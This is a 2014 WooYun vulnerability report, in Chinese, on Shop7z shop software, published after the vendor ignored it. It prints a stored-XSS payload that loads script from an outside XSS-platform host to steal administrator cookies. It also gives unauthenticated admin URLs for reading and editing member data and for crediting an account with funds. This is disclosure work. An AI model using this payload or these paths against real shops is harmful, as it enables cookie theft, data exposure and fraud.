漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-071885
漏洞标题:Shop7z多个漏洞大礼包
相关厂商:Shop7z
漏洞作者: LinE
提交时间:2014-08-12 17:33
修复时间:2014-09-26 17:34
公开时间:2014-09-26 17:34
漏洞类型:应用配置错误
危害等级:低
自评Rank:1
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-08-12: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-09-26: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
前台存储型XSS打后台,后台限制不严导致敏感数据访问,自己给自己充值TAT,等等····
详细说明:
0x01 前台XSS,使用官方最新的免费版源代码
在注册用户的时候,地址当中输入XSS代码
"><script src=http://xsser.l1n3.net/WY6NN2?1407683427></script>
如图
然后注册,显示注册成功
这时候查看一下后台---会员信息管理--会员管理---该会员详细信息
可以看到xss代码已经插进去了
而xss平台也能收到cookies信息
0x02 未授权访问
http://127.0.0.1/admin/huiyuandetail.asp?id=831
该地址在免费版中未做权限检查,导致可以直接在这里遍历会员信息,同时可以修改任意会员信息
相关代码
huiyuandetail.asp中检查过了,无权限相关检查,包含的两个文件,一个conn中给了一个cookies
conn.asp
另一个check4.asp是空文件,无用
导致了未授权的访问,完全可以遍历用户信息
0x03
业务逻辑导致给自己充钱
依然是之前的未授权访问,访问
http://127.0.0.1/admin/Chongzhiadd.asp
然后选择会员,我选择自己
冲他个百八十万的,我也是土豪,嘎嘎,然后直接确定,
查看充值记录
好了,瞬间变土豪....
还有一些其他的漏洞,暂时还没测试出来,等下一波再发吧
漏洞证明:
修复方案:
一个商场代码写的如此不严谨,如何面对江东父老啊·····
版权声明:转载请注明来源 LinE@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝